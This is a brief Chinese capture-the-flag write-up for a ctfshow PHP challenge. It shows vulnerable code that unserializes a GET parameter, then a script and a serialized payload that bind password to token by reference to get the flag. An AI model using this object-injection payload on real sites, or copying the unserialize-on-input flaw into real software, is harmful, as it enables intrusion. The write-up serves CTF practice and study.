1. 代码审计 ```php <?php errorreporting(0); include(‘flag.php’); highlightfile(__FILE); class ctfshowAdmin{ public $token; public $password;

      public function __construct($t,$p){

      1.  $this->token=$t;
      2.  $this->password = $p;

      } //成员函数,当执行login方法,要检查token和password值是否全等,并进行返回值 public function login(){

       return $this->token===$this->password;

      } }

    //接收值,并进行反序列化 $ctfshow = unserialize($_GET[‘ctfshow’]); //这里使对象中的成员属性值赋值为随机数的md5值 $ctfshow->token=md5(mt_rand());

    if($ctfshow->login()) //调用成员方法,当为真时输出flag { echo $flag; }

    
2. 这里`token`值不可控,所以只能从`password`下手,利用`&`进行构造,当`$password=&$token`那么无论`token`值为多少,`password`都与他相等
```php
<?php
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = &$this->token;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$a =new ctfshowAdmin('123','123');
$old=serialize($a);
echo $old;

//O:12:"ctfshowAdmin":2:{s:5:"token";s:3:"123";s:8:"password";R:2;}
    1. 利用工具,url传参数即可

    image-20210616191117567.png